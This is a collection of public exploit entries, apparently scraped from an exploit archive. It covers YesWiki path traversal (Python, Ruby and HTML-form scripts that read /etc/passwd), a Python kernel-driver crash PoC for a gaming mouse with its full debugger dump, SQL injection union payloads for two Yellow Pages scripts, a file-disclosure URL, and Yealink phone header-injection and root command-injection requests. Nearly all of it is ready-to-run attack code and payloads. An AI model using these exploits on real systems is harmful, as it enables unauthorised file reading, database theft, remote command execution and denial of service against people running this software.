HireHackking 
# Exploit Title: YesWiki < 4.5.2 - Unauthenticated Path Traversal
# Exploit Author: Al Baradi Joy
# Exploit Date: April 6, 2025
# CVE ID: CVE-2025-31131
# Vendor Homepage: https://yeswiki.net/
# Software Link: https://github.com/YesWiki/yeswiki
# Affected Version: < 4.5.2
# Tested On: YesWiki 4.5.1 on Ubuntu 22.04
# Vulnerability Type: Unauthenticated Path Traversal (LFI)
# CVSS Score: 8.6 (High)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
# Description:
#   YesWiki before version 4.5.2 is vulnerable to unauthenticated path
traversal via the 'squelette' parameter.
#   A remote attacker can exploit this issue to read arbitrary files on the
server, such as /etc/passwd.

import requests
import sys

def banner():
    print("=" * 80)
    print(" YesWiki < 4.5.2 - Unauthenticated Path Traversal
(CVE-2025-31131)")
    print(" Exploit Author: Al Baradi Joy")
    print("=" * 80)

def exploit(target, filename="/etc/passwd"):
    if not target.startswith("http"):
        target = "http://" + target

    traversal = "../" * 8
    encoded_file = filename.replace("/", "%2f")
    payload =
f"/?UrkCEO/edit&theme=margot&squelette={traversal}{encoded_file}&style=margot.css"
    url = target.rstrip("/") + payload

    try:
        print(f"[+] Target: {target}")
        print(f"[+] Attempting to read: {filename}")
        response = requests.get(url, timeout=10)

        if response.status_code == 200 and "root:" in response.text:
            print("[+] Exploit successful. File contents:\n")
            print(response.text)
        else:
            print("[!] Exploit failed or file not readable.")
            print(f"Status Code: {response.status_code}")
            if len(response.text) < 200:
                print(f"Response:\n{response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")

if __name__ == "__main__":
    banner()
    if len(sys.argv) < 2:
        print(f"Usage: python3 {sys.argv[0]} <target_url> [file_to_read]")
        print(f"Example: python3 {sys.argv[0]} http://victim.com
/etc/passwd")
        sys.exit(1)

    target_url = sys.argv[1]
    file_to_read = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd"
    exploit(target_url, file_to_read)
HireHackking 
# Exploit Title: YESWIKI 0.2 - Path Traversal (template param)
# Date: 2015-11-10
# Exploit Author: HaHwul
# Exploit Author Blog: http://www.codeblack.net
# Vendor Homepage: http://yeswiki.net
# Software Link: https://github.com/YesWiki/yeswiki
# Version: yeswiki 0.2
# Tested on: Debian [Wheezy] , Ubuntu
# CVE : none
# ===========================================
<!-- Open Browser: http://127.0.0.1/vul_test/yeswiki/wakka.php?wiki=HomePage/diaporama&template=/../../../../../../../../../../../../etc/passwd
--><br>
# Exploit Code<br>
# ===========================================
<br><br>

<form name="yeswiki_traversal2_poc" action="http://127.0.0.1/vul_test/yeswiki/wakka.php" method="GET">
<input type="hidden" name="wiki" value="HomePage/diaporama">
Target: Edit HTML Code<br>
File: <input type="text" name="template" value="/../../../../../../../../../../../../etc/passwd"><br>

<input type="submit" value="Exploit">
</form>
<!-- Auto Sumbit
<script type="text/javascript">document.forms.yeswiki_traversal2_poc.submit();</script>
-->
HireHackking 
# Exploit Title: YESWIKI 0.2 - Path Traversal
# Date: 2015-09-02
# Exploit Author: HaHwul
# Exploit Author Blog: http://www.codeblack.net
# Vendor Homepage: http://yeswiki.net
# Software Link: https://github.com/YesWiki/yeswiki
# Version: yeswiki 0.2
# Tested on: Debian [Wheezy]
# CVE : none
# ===========================================

#Vulnerability 
#Open Browser: http://[targetURL]//vul_test/yeswiki/wakka.php?wiki=PagesACreer/edit&theme=yeswiki&squelette=/../../../../../../../../../../../../etc/passwd&style=gray.css&bgimg=&newpage=1

require "net/http"
require "uri"

if ARGV.length != 2

puts "YESWIKI Path Traversal Exploit - File Downloader"
puts "Usage: ruby yeswiki_traversal.rb [targetURL wakka.php] [File name]"
puts "  Example : ~~.rb http://127.0.0.1/vul_test/yeswiki/wakka.php /etc/passwd"
puts "  exploit & code by hahwul[www.codeblack.net]"

else
puts "YESWIKI Path Traversal Exploit - File Downloader"
puts "#set Payload..."
target=ARGV[0]
downfile=ARGV[1]
puts " + target : #{target}"
puts " + DownFile : #{downfile}"
puts "#Exploit"
uri = URI.parse("#{target}/vul_test/yeswiki/wakka.php")
uri.query = URI.encode_www_form({"wiki"=>"PagesACreer/edit","newpage"=>"1","style"=>"gray.css","bgimg"=>"","squelette"=>"/../../../../../../../../../../../../#{downfile}","theme"=>"yeswiki"})
http = Net::HTTP.new(uri.host, uri.port)
request = Net::HTTP::Get.new(uri.request_uri)
response = http.request(request)
puts "#Response code: "+response.code
endNm = response.body.index("<")
result = response.body[0..endNm-1]
puts "#Result: "+result
puts "#End.."
end
HireHackking 
# Exploit Title: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC)
# Date: 2021/04/07		
# Exploit Author: Quadron Research Lab			
# Version: all version		
# Tested on: Windows 10 x64 HUN/ENG Professional
# Vendor: https://www.yenkee.eu/gaming-mouse-hornet-aim/yms-3029
# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/GM312Fltr

import ctypes, sys
from ctypes import *
import io
from itertools import product
from sys import argv

devicename = "GM312Fltr"

ioctl = 0x22245C

ioctl_list = '''
0x22245C
0x222440
0x222441
0x222400
0x222404
0x222408
0x222420
0x222424
0x222448
0x222450
0x22245c
0x222460
'''

kernel32 = windll.kernel32
hevDevice = kernel32.CreateFileA("\\\\.\\GM312Fltr", 0xC0000000, 0, None, 0x3, 0, None) 

if not hevDevice or hevDevice == -1:
    print ("Not Win! Sorry!")

else:
    print ("OPENED!")
                    
    buf = 'A' * 2000
    bufLength = 2000
    
    kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None)

[Bugcheck Analysis]
Fatal System Error 0x000000f7
                       (0xBEBEA1CAEAF0A2C1,0x0000F80736BC1742,0xFFFF07F8C943E8BD,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus
fffff807`2e1feb90 cc                      int     3
0 kd !analyze
Connected to Windows 10 19041 x64 target at (Mon Jun 14 204816.370 2021 (UTC + 200)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
........................

Press ctrl-c (cdb, kd, ntsd) or ctrl-break (windbg) to abort symbol loads that take too long.
Run !sym noisy before .reload to track down problems loading symbols.

........................................
.............................
Loading User Symbols
.............................................
Loading unloaded module list
........

                                                                             
                        Bugcheck Analysis                                    
                                                                             


DRIVER_OVERRAN_STACK_BUFFER (f7)
A driver has overrun a stack-based buffer.  This overrun could potentially
allow a malicious user to gain control of this machine.
DESCRIPTION
A driver overran a stack-based buffer (or local variable) in a way that would
have overwritten the function's return address and jumped back to an arbitrary
address when the function returned.  This is the classic buffer overrun
hacking attack and the system has been brought down to prevent a malicious user
from gaining complete control of it.
Do a kb to get a stack backtrace -- the last routine on the stack before the
buffer overrun handlers and bugcheck call is the one that overran its local
variable(s).
Arguments
Arg1 bebea1caeaf0a2c1, Actual security check cookie from the stack
Arg2 0000f80736bc1742, Expected security check cookie
Arg3 ffff07f8c943e8bd, Complement of the expected security check cookie
Arg4 0000000000000000, zero

Debugging Details
------------------


BUGCHECK_CODE  f7

BUGCHECK_P1 bebea1caeaf0a2c1

BUGCHECK_P2 f80736bc1742

BUGCHECK_P3 ffff07f8c943e8bd

BUGCHECK_P4 0

PROCESS_NAME  pythonw.exe

SYMBOL_NAME  GM312Fltr+e1e

MODULE_NAME GM312Fltr

IMAGE_NAME  GM312Fltr.sys

FAILURE_BUCKET_ID  0xF7_MISSING_GSFRAME_STACKPTR_ERROR_GM312Fltr!unknown_function

FAILURE_ID_HASH  {b8e05604-2a11-789a-ad29-fc4916710f2d}

Followup     MachineOwner
---------

0 kd kb
RetAddr            Args to Child                                                            Call Site
fffff807`2e312d12  fffff807`344a4ae0 fffff807`2e17d000 00000000`00000000 00000000`00000000  nt!DbgBreakPointWithStatus
fffff807`2e3122f6  00000000`00000003 fffff807`344a4ae0 fffff807`2e20bbc0 00000000`000000f7  nt!KiBugCheckDebugBreak+0x12
fffff807`2e1f6df7  fffff807`344a5210 00000000`00000000 fffff807`36bc18c8 fffff807`344a51a8  nt!KeBugCheck2+0x946
fffff807`36bc0e1e  00000000`000000f7 bebea1ca`eaf0a2c1 0000f807`36bc1742 ffff07f8`c943e8bd  nt!KeBugCheckEx+0x107
fffff807`36bc0ea7  fffff807`344a5210 00000000`00000000 fffff807`344a5748 fffff807`344a5720  GM312Fltr+0xe1e
fffff807`2e1ffbaf  fffff807`36bc0e94 00000000`00000000 00000000`00000000 00000000`00000000  GM312Fltr+0xea7
fffff807`2e087547  fffff807`344a5710 00000000`00000000 ffffe08b`abb1e380 fffff807`36bc0b5d  nt!RtlpExecuteHandlerForException+0xf
fffff807`2e086136  ffffe08b`abb1dcf8 fffff807`344a5e20 ffffe08b`abb1dcf8 ffffe30a`242183c0  nt!RtlDispatchException+0x297
fffff807`2e1f7b82  00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000  nt!KiDispatchException+0x186
fffff807`2e1f7b50  fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010  nt!KxExceptionDispatchOnExceptionStack+0x12
fffff807`2e208da5  00000000`ffffffff fffff807`2e0c3216 00000000`00000010 00000000`00000246  nt!KiExceptionDispatchOnExceptionStackContinue
fffff807`2e204ae0  ffffe30a`1ce27c00 ffffe30a`1ce21010 00000000`00000000 00000000`00000000  nt!KiExceptionDispatch+0x125
fffff807`2e1fe0c7  fffff807`2aab9180 000fa40d`b19b3dfe ffffe30a`27381080 fffff807`2eaea710  nt!KiGeneralProtectionFault+0x320
fffff807`2e1fda76  7fffe30a`29e4bb10 00000000`ffffffff 00000000`00000000 00000000`00000000  nt!SwapContext+0x377
fffff807`2e00c970  ffffe30a`00000006 00000000`ffffffff 00000000`00000000 ffffe30a`24218498  nt!KiSwapContext+0x76
fffff807`2e00be9f  ffffe30a`27381080 fffff807`36b819b6 ffffe08b`abb1e270 00000000`00000000  nt!KiSwapThread+0x500
fffff807`2e00b743  ffffe30a`00000034 00000000`00000000 ffffe30a`23c6d800 ffffe30a`273811c0  nt!KiCommitThreadWait+0x14f
fffff807`36bc0ca2  ffffe08b`abb1e350 fffff807`00000000 00000000`00000000 00000000`00004100  nt!KeWaitForSingleObject+0x233
fffff807`36bc0b5d  ffffffff`ff676980 00000000`00000000 00000000`00000bb8 fffff807`35142017  GM312Fltr+0xca2
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  GM312Fltr+0xb5d
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0  0x41414141`41414141
41414141`41414141  41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000  0x41414141`41414141
41414141`41414141  00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80  0x41414141`41414141
00000000`0020027f  00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000  0x41414141`41414141
00000000`5c4eafe0  00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000  0x20027f
00000000`00000000  0000ffff`00001f80 00000000`00000000 00000000`00000000 00000000`00000000  MSVCR90!pow+0x4e0
HireHackking 
# # # # # 
# Exploit Title: Yellow Pages Script v3.2 - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.phpjabbers.com/
# Software: https://www.phpjabbers.com/yellow-pages-script/
# Demo: http://demo.phpjabbers.com/index.php?demo=yps&front=1&lid=1
# Version: 3.2
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionIndex&category_id=[SQL]
# Etc..
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Yellow Pages Clone Script v1.3.4 - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/yellow-pages-clone-script/
# Demo: http://dexteritysolution.com/demo/directory/
# Version: 1.3.4
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/testmonial.php?blogid=[SQL]
# -2'+/*!50000union*/+select+1,@@version,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6-- -
# http://localhost/[PATH]/blog.php?blogid=[SQL]
# -2'+/*!50000union*/+select+1,@@version,3,4,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,6,7,8,9,10,11,12-- -
# Etc...
# # # # #
HireHackking 
source: https://www.securityfocus.com/bid/53674/info

The Yellow Duck Framework is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.

Exploiting this vulnerability could allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.

Yellow Duck Framework Beta1 2.0 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?id=./database/config.php
HireHackking 
source: https://www.securityfocus.com/bid/68022/info

Yealink VoIP Phones are prone to an HTTP-response-splitting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.

Yealink VoIP Phones firmware 28.72.0.2 and hardware 28.2.0.128.0.0.0 are vulnerable; other versions may also be affected. 

GET /servlet?linepage=1&model=%0d%0a[Header]&p=dsskey&q=load
HireHackking 
# Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
# Date: 11-10-2021
# Exploit Author: tahaafarooq
# Vendor Homepage: https://www.yealink.com/
# Version: 53.84.0.15
# Tested on: YeaLink IP Phone SIP-T19P (Hadrware VOIP Phone)

Description: 

Using Diagnostic tool from the Networking Tab to perform a Ping or Traceroute , to perform OS command injection

POC:

POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 49
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=9a83d24461329a130
Connection: close

cmd=; id;&token=1714636915c6acea98

-------------------------------------------------

HTTP/1.1 200 OK
Content-Type: text/html
Connection: close
Date: Wed, 10 Nov 2021 14:20:23 GMT
Server: embed httpd
Content-Length: 82

<html>
<body>
	<div id="_RES_INFO_">
            uid=0(root) gid=0(root)
        </div>
</body>
</html>